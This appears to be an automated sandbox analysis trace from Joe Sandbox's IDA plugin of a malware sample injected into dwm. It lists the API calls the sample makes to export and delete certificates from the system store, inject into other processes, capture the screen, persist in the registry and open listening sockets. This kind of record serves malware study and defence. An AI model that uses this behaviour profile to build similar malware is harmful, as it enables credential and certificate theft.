RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 006476B3

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 006476E2

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

RegCloseKey.KERNEL32(?), ref: 00647702

Strings

SOFTWARE\Microsoft\Xyuxy, xrefs: 00647699

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063BB5F, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

Part of subcall function 00642507: CreateMutexW.KERNELBASE(00652C30,00000000,?,?,?,?,?), ref: 00642528

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

GetCurrentThread.KERNEL32(000000F1,19367401,00000001), ref: 0063BB89
SetThreadPriority.KERNEL32(00000000), ref: 0063BB90
WaitForSingleObject.KERNEL32(00001388), ref: 0063BBA8

Part of subcall function 006431CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006431ED
Part of subcall function 006431CC: Process32FirstW.KERNEL32(000001E6,?), ref: 00643216
Part of subcall function 006431CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00643271
Part of subcall function 006431CC: CloseHandle.KERNEL32(00000000), ref: 0064328E
Part of subcall function 006431CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 006432A1
Part of subcall function 006431CC: CloseHandle.KERNEL32(?), ref: 0064330E
Part of subcall function 006431CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 0064331A
Part of subcall function 006431CC: CloseHandle.KERNEL32(000001E6), ref: 0064332B

WaitForSingleObject.KERNEL32(00001388), ref: 0063BBBD

Part of subcall function 00646B8E: ReleaseMutex.KERNEL32(00000000,00643021,?,?,?), ref: 00646B92

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063E89E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0063E8E0

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 0064768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 006476B3
Part of subcall function 0064768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 006476E2
Part of subcall function 0064768E: RegCloseKey.KERNEL32(?), ref: 00647702

Strings

SOFTWARE\Microsoft\Xyuxy, xrefs: 0063E8A7, 0063E8B2, 0063E8BE, 0063E8D9
Qanyodfyy, xrefs: 0063E8B7, 0063E8F2

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00646AAA, Relevance: 4.5, APIs: 3, Instructions: 41

APIs

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,006449F4,?,?,?,00642326,000000FF,00652C08), ref: 00646AC3
GetLastError.KERNEL32(?,?,006449F4,?,?,?,00642326,000000FF,00652C08,?,?,00000000), ref: 00646AC9

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,006449F4,?,?,?,00642326,000000FF,00652C08), ref: 00646AEF

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006449D2, Relevance: 4.5, APIs: 3, Instructions: 37

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00642326,000000FF,00652C08,?,?,00000000), ref: 006449E2

Part of subcall function 00646AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,006449F4,?,?,?,00642326,000000FF,00652C08), ref: 00646AC3
Part of subcall function 00646AAA: GetLastError.KERNEL32(?,?,006449F4,?,?,?,00642326,000000FF,00652C08,?,?,00000000), ref: 00646AC9
Part of subcall function 00646AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,006449F4,?,?,?,00642326,000000FF,00652C08), ref: 00646AEF

GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00642326,000000FF,00652C08), ref: 00644A0E

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

CloseHandle.KERNEL32(?), ref: 00644A23

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064763A, Relevance: 4.5, APIs: 3, Instructions: 36

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00649EAB,?,?,00000004), ref: 00647658
RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,00649EAB,?,?,00649EAB,?,?,00000004,?,00000004), ref: 00647672
RegCloseKey.ADVAPI32(00000004,?,?,00649EAB,?,?,00000004,?,00000004), ref: 00647681

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00642BA3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83

APIs

Part of subcall function 006420C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00642105
Part of subcall function 006420C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00642172
Part of subcall function 006420C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 006421A7
Part of subcall function 006420C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 006421DB
Part of subcall function 006420C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 006421FA
Part of subcall function 006420C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0064220C
Part of subcall function 006420C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0064221E
Part of subcall function 006420C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00642230
Part of subcall function 006420C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00642242
Part of subcall function 006420C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00642254
Part of subcall function 006420C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0064228D
Part of subcall function 006420C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 0064229C
Part of subcall function 006420C4: InitializeCriticalSection.KERNEL32(0065400C,?,?,00000000), ref: 006422C9
Part of subcall function 006420C4: WSAStartup.WS2_32(00000202,?), ref: 006422DF
Part of subcall function 006420C4: CreateEventW.KERNEL32(00652C30,00000001,00000000,00000000,?,?,00000000), ref: 00642300
Part of subcall function 006420C4: GetLengthSid.ADVAPI32(00000000,000000FF,00652C08,?,?,00000000), ref: 00642335
Part of subcall function 006420C4: GetCurrentProcessId.KERNEL32(00000000,00D8F7D0,00000000,?,?,00000000), ref: 00642362

Part of subcall function 00642A32: CloseHandle.KERNEL32(00652AF0), ref: 00642AF2

Part of subcall function 0063E959: CreateMutexW.KERNELBASE(00652C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,00634E69,?,?,?,743C152E,00000002), ref: 0063E97F

CoInitializeEx.OLE32(00000000,00000002), ref: 00642C62

Part of subcall function 00649837: CoUninitialize.OLE32 ref: 00649845

Part of subcall function 0064D486: CertOpenSystemStoreW.CRYPT32(00000000,00634BBC,?,00000000,00000001), ref: 0064D4A1
Part of subcall function 0064D486: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 0064D4BD
Part of subcall function 0064D486: CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 0064D4C9
Part of subcall function 0064D486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0064D508
Part of subcall function 0064D486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0064D538
Part of subcall function 0064D486: CharLowerW.USER32 ref: 0064D556
Part of subcall function 0064D486: GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0064D561
Part of subcall function 0064D486: CertCloseStore.CRYPT32(?,00000000), ref: 0064D5EA

Part of subcall function 0064D5FB: CertOpenSystemStoreW.CRYPT32(00000000,00634BBC,?,00000001,00642C2A), ref: 0064D606
Part of subcall function 0064D5FB: CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,00642C2A), ref: 0064D61F
Part of subcall function 0064D5FB: CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,00642C2A), ref: 0064D62A
Part of subcall function 0064D5FB: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,00642C2A), ref: 0064D632
Part of subcall function 0064D5FB: CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,00642C2A), ref: 0064D63E

Part of subcall function 0064A138: SHGetFolderPathW.SHELL32(00000000,00000021,00000000,00000000,?), ref: 0064A170

Strings

@, xrefs: 00642C99

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063E959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30

APIs

CreateMutexW.KERNELBASE(00652C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,00634E69,?,?,?,743C152E,00000002), ref: 0063E97F

Part of subcall function 0063E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0063E8E0

Part of subcall function 00646B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00646B0A
Part of subcall function 00646B07: CloseHandle.KERNEL32(00000000), ref: 00646B1C

Strings

Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 0063E95A, 0063E963, 0063E96C, 0063E977

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00649D6D, Relevance: 3.2, APIs: 2, Instructions: 172

APIs

InitializeCriticalSection.KERNEL32(00653F24,00000000,7718F8FF), ref: 00649D8F

Part of subcall function 00647595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00649E26,?,?), ref: 006475AD

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 00649E63

Part of subcall function 0064763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00649EAB,?,?,00000004), ref: 00647658
Part of subcall function 0064763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,00649EAB,?,?,00649EAB,?,?,00000004,?,00000004), ref: 00647672
Part of subcall function 0064763A: RegCloseKey.ADVAPI32(00000004,?,?,00649EAB,?,?,00000004,?,00000004), ref: 00647681

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

Part of subcall function 00647711: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,00649E78,?), ref: 0064771E
Part of subcall function 00647711: RegCloseKey.KERNEL32(?), ref: 0064772E

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00641EE1, Relevance: 3.1, APIs: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00641F2C

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

lstrcmpiW.KERNEL32(?,?,?), ref: 00641F56

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00647477, Relevance: 3.0, APIs: 2, Instructions: 22

APIs

SetLastError.KERNEL32(0000009B,00642AC8,00000000,0063BB5F,00000000,00652AF0,00000000,00000104,76C605D7,00000000), ref: 00647481
CreateThread.KERNEL32(00000000,00652AF0,00652AF0,00652AF0,00000000,00000000), ref: 006474A4

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00647607, Relevance: 3.0, APIs: 2, Instructions: 20

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,00649E26,?,?,?,006475CD,?,?,00000000,00000004,?), ref: 0064761F
RegCloseKey.KERNEL32(?,?,006475CD,?,?,00000000,00000004,?,?,?,?,00649E26,?,?), ref: 0064762D

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00647711, Relevance: 3.0, APIs: 2, Instructions: 18

APIs

RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,00649E78,?), ref: 0064771E
RegCloseKey.KERNEL32(?), ref: 0064772E

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063BE3B, Relevance: 1.6, APIs: 1, Instructions: 62

APIs

VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,0063C160,00652360), ref: 0063BE72

Part of subcall function 0063BD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,00000040,0063C160,00000000,00000000,00000004,?,?,0063C160,00652360), ref: 0063BD86
Part of subcall function 0063BD44: WriteProcessMemory.KERNEL32(000000FF,DB84D88A,?,35FFC690,00000000,?,?,0063C160,00652360), ref: 0063BD9C
Part of subcall function 0063BD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,0063C160,0063C160,?,?,0063C160,00652360), ref: 0063BDB6

Part of subcall function 00647BF7: VirtualProtectEx.KERNELBASE(000000FF,0063C160,0000001E,00000040,`#e,0063C158,00000004,?,?,?,?,0063BE97,6A006523,00000000), ref: 00647C24
Part of subcall function 00647BF7: ReadProcessMemory.KERNELBASE(000000FF,0063C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,0063BE97,6A006523,00000000), ref: 00647C4B
Part of subcall function 00647BF7: WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 00647CC5
Part of subcall function 00647BF7: WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 00647CED
Part of subcall function 00647BF7: VirtualProtectEx.KERNELBASE(000000FF,?,0000001E,`#e,`#e,?,?,?,?,0063BE97,6A006523,00000000,?,?,0063C160,00652360), ref: 00647D05

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00647595, Relevance: 1.5, APIs: 1, Instructions: 35

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00649E26,?,?), ref: 006475AD

Part of subcall function 00647607: RegQueryValueExW.KERNEL32(?,?,00000000,?,00649E26,?,?,?,006475CD,?,?,00000000,00000004,?), ref: 0064761F
Part of subcall function 00647607: RegCloseKey.KERNEL32(?,?,006475CD,?,?,00000000,00000004,?,?,?,?,00649E26,?,?), ref: 0064762D

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00642507, Relevance: 1.5, APIs: 1, Instructions: 23

APIs

CreateMutexW.KERNELBASE(00652C30,00000000,?,?,?,?,?), ref: 00642528

Part of subcall function 00646B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00646B0A
Part of subcall function 00646B07: CloseHandle.KERNEL32(00000000), ref: 00646B1C

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Non-executed Functions

Function 0064D486, Relevance: 12.1, APIs: 8, Instructions: 119

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00634BBC,?,00000000,00000001), ref: 0064D4A1
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 0064D4BD
CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 0064D4C9
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0064D508

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0064D538
CharLowerW.USER32 ref: 0064D556
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0064D561

Part of subcall function 0064D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0064D581,?,?,00000000), ref: 0064D43F

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

CertCloseStore.CRYPT32(?,00000000), ref: 0064D5EA

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064D5FB, Relevance: 7.5, APIs: 5, Instructions: 36

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00634BBC,?,00000001,00642C2A), ref: 0064D606
CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,00642C2A), ref: 0064D61F
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,00642C2A), ref: 0064D62A
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,00642C2A), ref: 0064D632
CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,00642C2A), ref: 0064D63E

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006464FD, Relevance: 6.0, APIs: 4, Instructions: 32

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 00646506
bind.WS2_32(00000000,?,-0000001D), ref: 00646526
listen.WS2_32(00000000,?), ref: 00646535
#3.WS2_32(00000000,?,00634C21,7FFFFFFF,?,00000000,00000080), ref: 00646540

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006467DB, Relevance: 4.5, APIs: 3, Instructions: 27

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 006467E4
bind.WS2_32(00000000,00000017,-0000001D), ref: 00646804
#3.WS2_32(00000000), ref: 0064680F

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063EA11, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0063EA43
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0063EA54
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0063EA61
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0063EA6E
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0063EA7B
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0063EA88
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0063EA95
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0063EAA2
LoadLibraryA.KERNEL32(ole32.dll), ref: 0063EAEA
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0063EAF5
LoadLibraryA.KERNEL32(gdi32.dll), ref: 0063EB07
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0063EB12
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0063EB1E
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0063EB2B
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0063EB38
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0063EB45
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0063EB52
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0063EB5F
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 0063EB6C
LoadImageW.USER32(00000000,00007F00,00000002,00000000,00000000,00008040), ref: 0063EC10
GetIconInfo.USER32(00000000,?), ref: 0063EC25
GetCursorPos.USER32(?), ref: 0063EC33
DrawIcon.USER32(?,?,?,?), ref: 0063ED04

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

lstrcmpiW.KERNEL32(?,-00000030), ref: 0063ED85

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

FreeLibrary.KERNEL32(00000000), ref: 0063EE9C
FreeLibrary.KERNEL32(?), ref: 0063EEA6
FreeLibrary.KERNEL32(00000000), ref: 0063EEB0

Strings

DeleteObject, xrefs: 0063EB54
GdipGetImageEncodersSize, xrefs: 0063EA7D
BitBlt, xrefs: 0063EB47
GdipCreateBitmapFromHBITMAP, xrefs: 0063EA63
CreateCompatibleDC, xrefs: 0063EB14
DeleteDC, xrefs: 0063EB61
gdi32.dll, xrefs: 0063EB02
CreateDCW, xrefs: 0063EB09
SelectObject, xrefs: 0063EB3A
GdipDisposeImage, xrefs: 0063EA70
GetDeviceCaps, xrefs: 0063EB2D
GdiplusShutdown, xrefs: 0063EA56
ole32.dll, xrefs: 0063EAE5
GdipSaveImageToStream, xrefs: 0063EA97
CreateCompatibleBitmap, xrefs: 0063EB20
gdiplus.dll, xrefs: 0063EA25
CreateStreamOnHGlobal, xrefs: 0063EAEC
DISPLAY, xrefs: 0063EBDE
GdipGetImageEncoders, xrefs: 0063EA8A
GdiplusStartup, xrefs: 0063EA4B

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006354A9, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308

APIs

Part of subcall function 0063DCA2: GetClassNameW.USER32(006A01CA,?,00000101), ref: 0063DCBD

GetWindowInfo.USER32(?,?), ref: 00635515
IntersectRect.USER32(?,?,-00000114), ref: 00635538
IntersectRect.USER32(?,?,-00000114), ref: 0063558E
GetDC.USER32(00000000), ref: 006355D2
CreateCompatibleDC.GDI32(00000000), ref: 006355E3
ReleaseDC.USER32(00000000,00000000), ref: 006355ED
SelectObject.GDI32(00000000,?), ref: 00635602
DeleteDC.GDI32(00000000), ref: 00635610
TlsSetValue.KERNEL32(?), ref: 0063565B
EqualRect.USER32(?,?), ref: 00635675
SaveDC.GDI32(00000000), ref: 00635680
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0063569B
SendMessageW.USER32(?,00000085,00000001,00000000), ref: 006356BB
DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 006356CD
RestoreDC.GDI32(00000000,?), ref: 006356E4
SaveDC.GDI32(00000000), ref: 00635706
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0063571C
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00635735
RestoreDC.GDI32(00000000,?), ref: 00635743
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00635756
SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00635766
DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00635778
TlsSetValue.KERNEL32(00000000), ref: 00635792
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 006357B2
DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 006357CE
SelectObject.GDI32(00000000,?), ref: 006357E4
DeleteDC.GDI32(00000000), ref: 006357EB
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00635813

Part of subcall function 006353C7: GdiFlush.GDI32 ref: 0063541E

PrintWindow.USER32(00000008,00000000,00000000), ref: 00635829

Strings

<, xrefs: 0063550B

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00642D01, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 243

APIs

Part of subcall function 006485D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 006485F5
Part of subcall function 006485D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00642D27,?,?,00000000), ref: 00648608
Part of subcall function 006485D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00642D27,?,?,00000000), ref: 00648630
Part of subcall function 006485D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00648648
Part of subcall function 006485D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00642D27,?,?,00000000), ref: 00648662
Part of subcall function 006485D0: CloseHandle.KERNEL32(?), ref: 0064866B

Part of subcall function 00648678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,0064C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 00648689
Part of subcall function 00648678: CloseHandle.KERNEL32(?), ref: 00648697

CreateMutexW.KERNEL32(00652C30,00000001,?,32901130,?,00000001,?), ref: 00642D91
GetLastError.KERNEL32 ref: 00642DA3
CloseHandle.KERNEL32(000001E6), ref: 00642DBA

Part of subcall function 0063E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0063E8E0

Part of subcall function 006431CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006431ED
Part of subcall function 006431CC: Process32FirstW.KERNEL32(000001E6,?), ref: 00643216
Part of subcall function 006431CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00643271
Part of subcall function 006431CC: CloseHandle.KERNEL32(00000000), ref: 0064328E
Part of subcall function 006431CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 006432A1
Part of subcall function 006431CC: CloseHandle.KERNEL32(?), ref: 0064330E
Part of subcall function 006431CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 0064331A
Part of subcall function 006431CC: CloseHandle.KERNEL32(000001E6), ref: 0064332B

ExitWindowsEx.USER32(00000014,80000000), ref: 00642DFD
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00642E1C
SetEvent.KERNEL32(00000000), ref: 00642E29
CloseHandle.KERNEL32(00000000), ref: 00642E30

Part of subcall function 00642A32: CloseHandle.KERNEL32(00652AF0), ref: 00642AF2

CloseHandle.KERNEL32(000001E6), ref: 00642E42
ReadProcessMemory.KERNEL32(000000FF,006A0014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00642EA6
Sleep.KERNEL32(000001F4), ref: 00642EB8
IsWellKnownSid.ADVAPI32(00D8F7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00642EC9
ReadProcessMemory.KERNEL32(000000FF,006A0014,00000000,00000001,00000000), ref: 00642EF1
